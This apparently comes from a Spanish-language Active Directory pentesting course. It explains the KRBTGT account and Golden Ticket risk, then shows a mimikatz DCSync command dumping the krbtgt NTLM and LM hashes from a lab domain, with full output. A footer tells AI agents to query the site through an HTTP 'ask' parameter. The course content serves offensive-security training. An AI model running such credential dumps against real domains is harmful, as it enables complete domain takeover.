# ¿Que es KRBTGT?

La cuenta `KRBTGT` es una cuenta de usuario del sistema en el dominio de Active Directory que es creada automáticamente cuando se instala el dominio. Es una cuenta crucial para el correcto funcionamiento de la autenticación Kerberos en un dominio de Windows.

Aquí están los puntos claves de la cuenta `KRBTGT`:

1. <mark style="color:red;">**Función en Kerberos:**</mark>
   * `KRBTGT` es el principal de seguridad para el servicio de Kerberos en un dominio de Active Directory.
   * Se usa para firmar y cifrar todos los Ticket Granting Tickets (TGT) emitidos por el servicio de Kerberos dentro del dominio.
   * Cuando un usuario se autentica a través de Kerberos, se le entrega un TGT cifrado y firmado que acredita su identidad frente al Ticket Granting Service (TGS).
2. <mark style="color:red;">**Seguridad de la cuenta:**</mark>
   * La cuenta `KRBTGT` tiene un conjunto de credenciales asociadas (es decir, un hash de contraseña), que son usadas para proteger los TGT.
   * La contraseña de esta cuenta no se utiliza para la autenticación interactiva, y normalmente no se cambia regularmente, aunque las buenas prácticas de seguridad recomiendan cambiarla al menos una vez cada cierto tiempo (especialmente después de un incidente de seguridad).
3. <mark style="color:red;">**Riesgos de seguridad:**</mark>
   * Si un atacante obtiene el hash de la contraseña de la cuenta `KRBTGT`, puede generar Golden Tickets, que permiten una amplia libertad para autenticarse en cualquier parte del dominio como cualquier usuario.
   * Es esencial mantener la seguridad de esta cuenta, ya que su compromiso puede resultar en una pérdida total del control sobre los recursos de Active Directory.
4. <mark style="color:red;">**Medidas de protección:**</mark>
   * La cuenta `KRBTGT` está deshabilitada para el inicio de sesión, lo que significa que no se puede usar para acceder a un sistema de forma interactiva o a través de la red.
   * Debe ser protegida con una contraseña fuerte y compleja, y como medida de mitigación contra los ataques de Golden Ticket, se recomienda cambiar su contraseña dos veces en una rápida sucesión como parte de una corrección tras un incidente de seguridad.

Es fundamental para los administradores de Active Directory entender el rol y la importancia de la cuenta `KRBTGT` para mantener la integridad y seguridad del proceso de autenticación Kerberos en sus redes.

Teniendo en cuenta lo explicado en [DCSync](/cpad/persistencia-y-post-explotacion-en-ad/dcsync.md) podemos obtener el HASH de KRBTGT:\
Para realizar un DCSync podriamos realizarlo para extraer la informacion de un usuario en especifico o de todos los usuarios:

```powershell
PS C:\> .\mimikatz.exe

mimikatz # lsadump::dcsync /domain:spartancybersec.corp /user:krbtgt
[DC] 'spartancybersec.corp' will be the domain
[DC] 'First-DC.spartancybersec.corp' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/19/2022 11:34:18 PM
Object Security ID   : S-1-5-21-1861162130-2580302541-221646211-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: b44daa015f201fa31126895ebbcbbcab
    ntlm- 0: b44daa015f201fa31126895ebbcbbcab
    lm  - 0: 216e51b46d2f3117bfb04f5b1aeef460
```

<mark style="color:red;">El Hash NTLM de KRBTGT seria: b44daa015f201fa31126895ebbcbbcab</mark>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/cpad/persistencia-y-post-explotacion-en-ad/golden-ticket/que-es-krbtgt.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.